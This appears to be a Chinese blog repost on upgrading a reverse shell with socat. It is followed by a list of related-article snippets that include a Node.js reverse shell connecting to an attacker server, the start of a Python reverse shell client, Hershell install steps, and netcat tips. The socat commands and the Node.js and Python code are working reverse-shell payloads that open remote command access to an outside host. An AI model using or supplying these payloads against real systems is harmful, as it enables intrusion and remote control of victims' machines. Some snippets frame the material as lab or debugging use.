反向Shell增强

下载socat

在客户端:

socat file:`tty`,raw,echo=0 tcp-listen:4444

在服务端:

socat exec:‘bash -li‘,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

如此即可创建功能完全的反向shell

原文地址:https://www.cnblogs.com/JiangOil/p/10513914.html

时间: 2024-10-04 17:22:01

反向Shell增强的相关文章

JavaScript反向shell

Node.js反向Shell 摘自:http://www.itfang.net/?p=109 如下的Javascript就是一个Node.js的反向连接shell. 这个payload将会生成一个/bin/sh的shell,创建一个TCP连接到攻击者的服务器,并且在通信数据流中绑定shell命令. (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn(&

反向shell(python)

反向shell(python) client: import socket, subprocess, sys RHOST = sys.argv[1] RPORT = 443 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((RHOST, RPORT)) while True: data = s.recv(1024) en_data = bytearray(data) for i in range(len(en_dat

使用 netcat 实现反向 shell 访问以便于远程调试设备

问题 在实际开发项目中,原型产品在推向市场.实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进. 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里.当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了. 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录.由于设备在远程,是无法通过 ssh 直接登录了. 基本概念 我们上面说的"登录",其实都是是指通过 Linux 的 shell 登录系统.那下面准备介绍

Android 程序中获取一个反向 Shell

代码如下: String command = "ls -al /"; Process process = Runtime.getRuntime().exec(command); 之后即可通过 Process 对象获取输入输出 这样获得的shell具有的是与应用相同的 UID, 所以无法做到一些越权访问的命令, 比如 ls -al /data/misc 原文地址:https://www.cnblogs.com/seliote/p/9313596.html

linux杂记(十)?what is BASH Shell

first,what is shell?其实只要是碰过计算机的,对于OS(Operation System操作系统,不管是linux.unix.windows)有点概念的人大多都听过这个名词,因为只要有OS那么就离不开Shell.其实Shell就是将我们输入的指令与kernel(核心)的沟通,使kernel可以控制hardware硬件(例如声卡,网卡,显卡)来正确无误工作. 基本上,替我们工作的是[hardware],控制硬件的是[kernel],而我们user则是利用[shell]控制一些ke

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境

安装pycharm www.jetbrains.com/pycharm/ tar -zxvf p补全 ls cd p补全 ls cd bin ls ./pycharm.sh 新建项目 pythonRocks.py print "python Rocks" cd Desktop ls chmod +x pythonRocks.py ls python pythonRocks.py 导入Nmap模块 cd Desktop pip install python-nmap 从网站的方式下载模块

[Shell] Hershell 使用介绍

0x01 简介 Hershell 是一款 go 语言编写的多平台反向 shell 生成器,使用 tls 加密流量,并提供证书公钥指纹固定功能,防止流量拦截. 0x02 安装及配置 因为是第一次接触go,相应不同环境请自行摸索: Linux: apt-get install golang cd /home/admin/ git clone https://github.com/lesnuages/hershell.git mkdir go export GOPATH=/home/admin/go/

恶意代码分析实战

恶意代码分析实战(最权威的恶意代码分析指南,理论实践分析并重,业内人手一册的宝典) [美]Michael Sikorski(迈克尔.斯科尔斯基), Andrew Honig(安德鲁.哈尼克)著   <恶意代码分析实战>是一本内容全面的恶意代码分析技术指南,其内容兼顾理论,重在实践,从不同方面为读者讲解恶意代码分析的实用技术方法. <恶意代码分析实战>分为21章,覆盖恶意代码行为.恶意代码静态分析方法.恶意代码动态分析方法.恶意代码对抗与反对抗方法等,并包含了 shellcode分析

渗透中Necat的另类用法

Necat 是一个伟大而实用的用于 TCP 和 UPD 网络连接协议的读写程序.同时 Necat 也被誉为网络中的瑞士军刀,在许多黑客教程中 Necat 也被广泛使用.Necat 最常见用途是设置反向连接和 bind shell ,管道和重定向网络流量,端口侦听,调试程序和脚本,抓取 banner 等作用.在本教程中,我们将学到以下内容: 1. Banner 抓取 2. 原始连接 3. Webserver 交互 4. 文件传输 5. Necat 端口扫描6. 绑定和反弹 shell 我们将使用运